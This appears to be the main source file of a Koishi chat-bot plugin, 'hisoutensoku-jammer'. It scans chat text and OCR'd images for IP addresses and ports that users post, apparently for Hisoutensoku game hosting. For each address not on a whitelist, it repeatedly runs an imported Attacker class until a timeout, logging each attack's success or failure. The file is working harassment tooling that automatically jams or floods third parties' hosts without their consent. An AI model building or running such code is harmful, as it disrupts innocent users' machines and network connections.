import 'source-map-support/register';
import { Context, Logger, NextFunction, Session, Cache, segment } from 'koishi';
import {
  HisoutensokuJammerPluginConfig,
  HisoutensokuJammerPluginConfigLike,
} from './config';
import {
  KoishiPlugin,
  InjectConfig,
  UseMiddleware,
  InjectLogger,
  Inject,
  UseEvent,
  OnConnect,
} from 'koishi-thirdeye';
import { Attacker } from './attacker';
import moment from 'moment';
import { chineseCharacterList } from './chinese-replace';
import { createWorker, Worker } from 'tesseract.js';
export * from './config';

declare module 'koishi' {
  interface Modules {
    'hisoutensoku-jammer': typeof import('.');
  }
  namespace Cache {
    interface Tables {
      lastMessages: string;
    }
  }
}

const matcherGlobal = /([1-2]?[^\d]?\d{0,2})(([^\d]+[1-2]?\d{1,2}){3,}?).+?([1-6]([^\d]*\d){4})/g;
const matcherSingle = /([1-2]?[^\d]?\d{0,2})(([^\d]+[1-2]?\d{1,2}){3,}?).+?([1-6]([^\d]*\d){4})/;

const PROTOCOL_BASE64 = 'base64://';

@KoishiPlugin({
  name: 'hisoutensoku-jammer',
  schema: HisoutensokuJammerPluginConfig,
})
export default class HisoutensokuJammerPlugin implements OnConnect {
  constructor(
    private ctx: Context,
    config: HisoutensokuJammerPluginConfigLike,
  ) {}

  @InjectLogger()
  private log: Logger;

  @Inject('cache', true)
  private cache: Cache;

  onConnect() {
    this.cache.table('lastMessages', { maxAge: 600000 });
  }

  @InjectConfig()
  private config: HisoutensokuJammerPluginConfig;

  ocrWorker: Worker;

  @UseEvent('connect')
  async loadWorkers() {
    this.ocrWorker = await this.config.loadOcr();
  }

  @UseMiddleware()
  async onMessage(session: Session, next: NextFunction) {
    this.parseMessage(session.content, session.userId).then();
    return next();
  }

  private parseMessage(message: string, sender: string) {
    const segmentChain = segment.parse(message);
    const textSegments = segmentChain.filter(
      (segment) => segment.type === 'text',
    );
    const textMessage = textSegments
      .map((segment) => segment.data.content)
      .join('')
      .trim();
    if (!this.ocrWorker) {
      return this.handleMessage(textMessage, sender);
    }
    const imageMessageUrls = segmentChain
      .filter((segment) => segment.type === 'image' && segment.data?.url)
      .map((segment) => segment.data.url);
    return Promise.all([
      this.handleMessage(textMessage, sender),
      this.workForOcr(imageMessageUrls, sender),
    ]);
  }

  private async download(url: string) {
    if (url.startsWith(PROTOCOL_BASE64)) {
      return Buffer.from(url.slice(PROTOCOL_BASE64.length), 'base64');
    }
    const data = await this.ctx.http.get.arraybuffer(url);
    return Buffer.from(data);
  }

  private async recognize(imageUrl: string) {
    try {
      const image = await this.download(imageUrl);
      const result = await this.ocrWorker.recognize(image);
      if (!result?.data?.text?.length) {
        this.log.warn(`Recognition of ${imageUrl} failed.`);
        return '';
      }
      const text = result.data.text;
      this.log.info(`Recognition of ${imageUrl}: ${text}`);
      return text;
    } catch (e) {
      this.log.warn(`Errored to recognize ${imageUrl}: ${e.toString()}`);
      return '';
    }
  }

  private async workForOcr(imageUrls: string[], sender: string) {
    const text = (
      await Promise.all(imageUrls.map((imageUrl) => this.recognize(imageUrl)))
    ).join('');
    return this.handleMessage(text, sender, false);
  }

  private async handleMessage(
    message: string,
    sender: string,
    useCache = true,
  ) {
    let receivedMessage = message.split('\n').join(' ').toLowerCase();
    for (const chineseCharacter of chineseCharacterList) {
      receivedMessage = receivedMessage.replace(
        chineseCharacter.characterRegExp,
        chineseCharacter.value,
      );
    }

    let messageMatch = receivedMessage.match(matcherGlobal);
    if (useCache) {
      const lastMessage = await this.cache.get('lastMessages', sender);
      if (lastMessage) {
        receivedMessage = `${lastMessage} ${receivedMessage}`;
        if (!messageMatch) {
          messageMatch = receivedMessage.match(matcherGlobal);
        }
      }
      if (!messageMatch) {
        await this.cache.set('lastMessages', sender, receivedMessage);
        return;
      }
      await this.cache.del('lastMessages', sender);
    } else if (!messageMatch) {
      return;
    }
    const attackPromises = messageMatch.map((pattern) => {
      const patternMatch = pattern.match(matcherSingle);
      const firstDigit = patternMatch[1].replace(/[^\d]+/g, '');
      const address = `${firstDigit}.${patternMatch[2]
        .split(/[^\d]+/)
        .filter((s) => s.length)
        .join('.')}`;
      const port = parseInt(patternMatch[4].replace(/[^\d]+/g, ''));
      return this.startAttack(address, port);
    });
    const results: boolean[] = await Promise.all(attackPromises);
  }

  private async startAttack(address: string, port: number): Promise<boolean> {
    if (this.config.isWhitelisted(address)) {
      this.log.info(`Attack of ${address}:${port} skipped.`);
      return false;
    }
    this.log.info(`Attack of ${address}:${port} started.`);
    const currentTime = moment();
    while (moment().diff(currentTime) <= this.config.attackTimeout) {
      const attacker = new Attacker(address, port, 1000);
      let err;
      try {
        err = await attacker.attack();
      } catch (e) {
        err = `Error: ${e.toString()}`;
      }
      if (err) {
        this.log.warn(`Attack of ${address}:${port} failed: ${err}`);
      } else {
        this.log.info(`Attack of ${address}:${port} succeeded.`);
      }
    }
    this.log.info(`Attack of ${address}:${port} finished.`);
    return true;
  }
}
